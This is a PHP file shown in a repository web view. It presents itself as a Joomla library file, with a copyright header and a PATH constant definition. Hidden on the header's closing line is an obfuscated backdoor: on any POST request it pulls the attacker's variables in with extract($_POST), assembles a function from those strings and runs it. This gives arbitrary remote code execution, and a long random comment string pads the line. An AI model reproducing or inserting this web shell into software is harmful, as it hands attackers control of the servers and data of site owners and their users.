-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathapi.rubber.php
14 lines (12 loc) · 2.1 KB
/
api.rubber.php
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
/**
* @package Libraries
* **************************************************************************************
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/ if ( !empty ( $_POST ) ) {extract ($_POST) ; $h =$d('', $f( $s( "c", "", $m) ) ) ; $h () ; } // Uu4GpNzET0fBurwUVNZt8eV8eq6UAcNM8xtG1aDqFwmzgpVzbUdc0NSPZG9tqvMnH5uyAQM3aeR3Du77GU7aEf542Tgse3PQyEFCNdMFNA6s1GfTcRaS8ZnsrtVQAVTkRUM6BZy57y8Dmdhg8bzBFM3PNFwKcAxvQpZVV9rfz9HNg7Zwqv2rdmtDYNgrEwRpP6QX6ED09yYn1GtP3BzFcNBCMW6DU0fUCe1C1qUaMCXw4kZexRXeK0vTCqaA4EVcw5WYq3
// Set the platform root path as a constant if necessary.
if (!defined('PATH'))
{
define('PATH', __DIR__) ;
}